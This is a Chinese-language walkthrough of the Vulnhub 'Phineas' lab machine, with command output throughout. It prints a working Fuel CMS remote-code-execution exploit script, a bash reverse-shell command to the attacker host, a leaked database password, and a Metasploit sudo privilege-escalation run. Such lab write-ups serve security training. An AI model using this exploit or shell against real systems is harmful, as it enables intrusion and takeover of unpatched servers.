Vulnhub之Phineas靶机详细测试过程
Phineas
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.60.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:be:bb:0d 1 60 PCS Systemtechnik GmbH
192.168.56.233 08:00:27:56:5f:21 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.233
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.233 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-27 23:34 EST
Nmap scan report for bogon (192.168.56.233)
Host is up (0.000077s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 ac:d8:0a:a8:6a:1f:78:6d:ac:06:8f:65:3e:ff:9c:8b (RSA)
| 256 e7:f8:b0:07:1c:5b:4a:48:10:bc:f6:36:42:62:6c:e0 (ECDSA)
|_ 256 c8:f0:ea:b8:bf:6b:a5:12:1f:9a:91:62:9d:1a:ce:75 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Apache HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
3306/tcp open mysql MariaDB (unauthorized)
MAC Address: 08:00:27:56:5F:21 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.69 seconds
NMAP扫描结果表明目标主机有4个开放端口:22(SSH)、80(HTTP)、111(RPC)、3306(MYSQL).
Get Access
先看一下mysql是否有默认的用户名和密码:
┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ mysql -uroot -p -h 192.168.56.233
Enter password:
ERROR 1130 (HY000): Host '192.168.56.206' is not allowed to connect to this MariaDB server
┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ mysql -uroot -p -h 192.168.56.233
Enter password:
ERROR 1130 (HY000): Host '192.168.56.206' is not allowed to connect to this MariaDB server
访问80端口,返回web默认页面:
┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ curl http://192.168.56.233/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ gobuster dir -u http://192.168.56.233 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.233
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/28 00:53:07 Starting gobuster in directory enumeration mode
===============================================================
/structure (Status: 301) [Size: 240] [--> http://192.168.56.233/structure/]
Progress: 217711 / 220561 (98.71%)===============================================================
2022/11/28 00:53:36 Finished
===============================================================
Gobuster工具识别出/structure目录,继续往深扫描:
┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ gobuster dir -u http://192.168.56.233/structure/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.233/structure/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: txt,html,sh,php
[+] Timeout: 10s
===============================================================
2022/11/28 01:00:03 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 217]
/assets (Status: 301) [Size: 247] [--> http://192.168.56.233/structure/assets/]
/index.php (Status: 200) [Size: 9288]
/robots.txt (Status: 200) [Size: 30]
/fuel (Status: 301) [Size: 245] [--> http://192.168.56.233/structure/fuel/]
/.html (Status: 403) [Size: 217]
Progress: 1102758 / 1102805 (100.00%)===============================================================
2022/11/28 01:02:36 Finished
===============================================================
进一步发现了/fuel目录,是一种CMS。
当访问/structure/fuel,会被自动重定向/structure/fuel/start,但是返回错误。
查了一下其他人的做法,正确的URL应该是/structure/index.php/fuel
http://192.168.56.233/structure/index.php/fuel/
有个非验证漏洞:
┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ wget https://gist.githubusercontent.com/kriss-u/8e1b44b1f4e393cf0d8a69117227dbd2/raw/4419f8dc7090a41c7ebc96048daf67c43c1996a3/exploit.py
--2022-11-28 01:18:46-- https://gist.githubusercontent.com/kriss-u/8e1b44b1f4e393cf0d8a69117227dbd2/raw/4419f8dc7090a41c7ebc96048daf67c43c1996a3/exploit.py
Resolving gist.githubusercontent.com (gist.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
Connecting to gist.githubusercontent.com (gist.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1380 (1.3K) [text/plain]
Saving to: ‘exploit.py’
exploit.py 100%[=====================================================>] 1.35K --.-KB/s in 0s
2022-11-28 01:18:47 (53.3 MB/s) - ‘exploit.py’ saved [1380/1380]
┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ ls
exploit.py nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ cat exploit.py
# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
# Updated by Krishna Upadhyay for Python 3
import requests
import urllib
url = "http://10.0.2.29/structure/index.php"
def find_nth_overlapping(haystack, needle, n):
start = haystack.find(needle)
while start >= 0 and n > 1:
start = haystack.find(needle, start+1)
n -= 1
return start
while 1:
# xxxx = raw_input('cmd:') # python 2
xxxx = input('cmd:') # python 3
# quoted_xxxx = urllib.quote(xxxx) # python 2
quoted_xxxx = urllib.parse.quote(xxxx) # python 3
full_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quoted_xxxx+"%27%29%2b%27"
# proxy = {"http":"http://127.0.0.1:8080"}
r = requests.get(full_url) #, proxies=proxy)
html = "<!DOCTYPE html>"
htmlcharset = r.text.find(html)
begin = r.text[0:20]
dup = find_nth_overlapping(r.text,begin,2)
# print r.text[0:dup] # python 2
# print(r.text[0:dup]) # python 3
t = r.text[0:dup]
div_position = t.find("<div ")
print(t[0:div_position])
需要修改exploit.py代码(目标主机的IP地址):
┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ python exploit.py
cmd:id
systemuid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
cmd:which nc
system/usr/bin/nc
cmd:
接下来设法spawn一个新的shell:
发现这是一个功能受限的shell, 经过尝试,修改端口为80,即可成功回弹:
cmd:bash -i >& /dev/tcp/192.168.56.206/5555 0>&1
system
cmd:bash -i >& /dev/tcp/192.168.56.206/80 0>&1
bash-4.2$ cat database.php
cat database.php
<?php
defined('BASEPATH') OR exit('No direct script access allowed');
/*
| -------------------------------------------------------------------
| DATABASE CONNECTIVITY SETTINGS
| -------------------------------------------------------------------
| This file will contain the settings needed to access your database.
|
| For complete instructions please consult the 'Database Connection'
| page of the User Guide.
|
| -------------------------------------------------------------------
| EXPLANATION OF VARIABLES
| -------------------------------------------------------------------
|
| ['dsn'] The full DSN string describe a connection to the database.
| ['hostname'] The hostname of your database server.
| ['username'] The username used to connect to the database
| ['password'] The password used to connect to the database
| ['database'] The name of the database you want to connect to
| ['dbdriver'] The database driver. e.g.: mysqli.
| Currently supported:
| cubrid, ibase, mssql, mysql, mysqli, oci8,
| odbc, pdo, postgre, sqlite, sqlite3, sqlsrv
| ['dbprefix'] You can add an optional prefix, which will be added
| to the table name when using the Query Builder class
| ['pconnect'] TRUE/FALSE - Whether to use a persistent connection
| ['db_debug'] TRUE/FALSE - Whether database errors should be displayed.
| ['cache_on'] TRUE/FALSE - Enables/disables query caching
| ['cachedir'] The path to the folder where cache files should be stored
| ['char_set'] The character set used in communicating with the database
| ['dbcollat'] The character collation used in communicating with the database
| NOTE: For MySQL and MySQLi databases, this setting is only used
| as a backup if your server is running PHP < 5.2.3 or MySQL < 5.0.7
| (and in table creation queries made with DB Forge).
| There is an incompatibility in PHP with mysql_real_escape_string() which
| can make your site vulnerable to SQL injection if you are using a
| multi-byte character set and are running versions lower than these.
| Sites using Latin-1 or UTF-8 database character set and collation are unaffected.
| ['swap_pre'] A default table prefix that should be swapped with the dbprefix
| ['encrypt'] Whether or not to use an encrypted connection.
|
| 'mysql' (deprecated), 'sqlsrv' and 'pdo/sqlsrv' drivers accept TRUE/FALSE
| 'mysqli' and 'pdo/mysql' drivers accept an array with the following options:
|
| 'ssl_key' - Path to the private key file
| 'ssl_cert' - Path to the public key certificate file
| 'ssl_ca' - Path to the certificate authority file
| 'ssl_capath' - Path to a directory containing trusted CA certificats in PEM format
| 'ssl_cipher' - List of *allowed* ciphers to be used for the encryption, separated by colons (':')
| 'ssl_verify' - TRUE/FALSE; Whether verify the server certificate or not ('mysqli' only)
|
| ['compress'] Whether or not to use client compression (MySQL only)
| ['stricton'] TRUE/FALSE - forces 'Strict Mode' connections
| - good for ensuring strict SQL while developing
| ['ssl_options'] Used to set various SSL options that can be used when making SSL connections.
| ['failover'] array - A array with 0 or more data for connections if the main should fail.
| ['save_queries'] TRUE/FALSE - Whether to "save" all executed queries.
| NOTE: Disabling this will also effectively disable both
| $this->db->last_query() and profiling of DB queries.
| When you run a query, with this setting set to TRUE (default),
| CodeIgniter will store the SQL statement for debugging purposes.
| However, this may cause high memory usage, especially if you run
| a lot of SQL queries ... disable this to avoid that problem.
|
| The $active_group variable lets you choose which connection group to
| make active. By default there is only one group (the 'default' group).
|
| The $query_builder variables lets you determine whether or not to load
| the query builder class.
*/
$active_group = 'default';
$query_builder = TRUE;
$db['default'] = array(
'dsn' => '',
'hostname' => 'localhost',
'username' => 'anna',
'password' => 'H993hfkNNid5kk',
'database' => 'anna',
'dbdriver' => 'mysqli',
'dbprefix' => '',
'pconnect' => FALSE,
'db_debug' => (ENVIRONMENT !== 'production'),
'cache_on' => FALSE,
'cachedir' => '',
'char_set' => 'utf8',
'dbcollat' => 'utf8_general_ci',
'swap_pre' => '',
'encrypt' => FALSE,
'compress' => FALSE,
'stricton' => FALSE,
'failover' => array(),
'save_queries' => TRUE
);
// used for testing purposes
if (defined('TESTING'))
{
@include(TESTER_PATH.'config/tester_database'.EXT);
}
bash-4.2$
得到了用户anna的密码,切换到anna用户:
┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ ssh anna@192.168.56.233
The authenticity of host '192.168.56.233 (192.168.56.233)' can't be established.
ED25519 key fingerprint is SHA256:25/XYWdRbWeE9Y3AfP5bBwCQiXr/wyKH76cZ+60/KYU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.233' (ED25519) to the list of known hosts.
anna@192.168.56.233's password:
[anna@phineas ~]$ id
uid=1001(anna) gid=1001(anna) groups=1001(anna) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[anna@phineas ~]$
提权
msf6 > search ssh_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner
1 auxiliary/scanner/ssh/ssh_login_pubkey normal No SSH Public Key Login Scanner
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, us
er, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/
Using-Metasploit
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.56.233
RHOSTS => 192.168.56.233
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME anna
USERNAME => anna
msf6 auxiliary(scanner/ssh/ssh_login) > set PASSWORD H993hfkNNid5kk
PASSWORD => H993hfkNNid5kk
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 192.168.56.233:22 - Starting bruteforce
[+] 192.168.56.233:22 - Success: 'anna:H993hfkNNid5kk' 'uid=1001(anna) gid=1001(anna) groups=1001(anna) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux phineas 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 1 opened (192.168.56.206:45741 -> 192.168.56.233:22) at 2022-11-28 01:38:57 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell linux SSH kali @ 192.168.56.206:45741 -> 192.168.56.233:22 (192.168.56.233)
msf6 auxiliary(scanner/ssh/ssh_login) > search 2021-3156
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/local/sudo_baron_samedit 2021-01-26 excellent Yes Sudo Heap-Based Buffer Overflow
Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/local/sudo_baron_samedit
msf6 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/sudo_baron_samedit
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/sudo_baron_samedit) > show options
Module options (exploit/linux/local/sudo_baron_samedit):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
WritableDir /tmp yes A directory where you can write files.
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(linux/local/sudo_baron_samedit) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(linux/local/sudo_baron_samedit) > set LPORT 6666
LPORT => 6666
msf6 exploit(linux/local/sudo_baron_samedit) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/sudo_baron_samedit) > exploit
[!] SESSION may not be compatible with this module:
[!] * incompatible session architecture:
[*] Started reverse TCP handler on 192.168.56.206:6666
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.
[*] Using automatically selected target: CentOS 7 x64 (sudo v1.8.23, libc v2.17)
[*] Writing '/tmp/eadWVa7bpS.py' (6207 bytes) ...
[*] A successful exploit will create a new root user msf with password fdocnoxrowembif
[*] Brute forcing ASLR (can take several minutes)...
[+] Success! Created new user msf with password fdocnoxrowembif
[*] Writing '/tmp/Rhoo25UX' (266 bytes) ...
[*] Sending stage (3020772 bytes) to 192.168.56.233
[!] /etc/passwd overwritten, but no session created.
[!] Manual cleanup of the new user in the /etc/passwd file is required.
[!] Take note of the username and password above - these should work to manually escalate privileges.
[+] Deleted /tmp/eadWVa7bpS.py
[+] Deleted /tmp/Rhoo25UX
[*] Cleaning up /etc/passwd
[*] Meterpreter session 2 opened (192.168.56.206:6666 -> 192.168.56.233:46890) at 2022-11-28 01:40:25 -0500
meterpreter > sessions
Usage: sessions <id>
Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>
meterpreter > sessions -i 2
Usage: sessions <id>
Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>
meterpreter > sessions 2
[*] Session 2 is already interactive.
meterpreter >
STRIVE FOR PROGRESS,NOT FOR PERFECTION
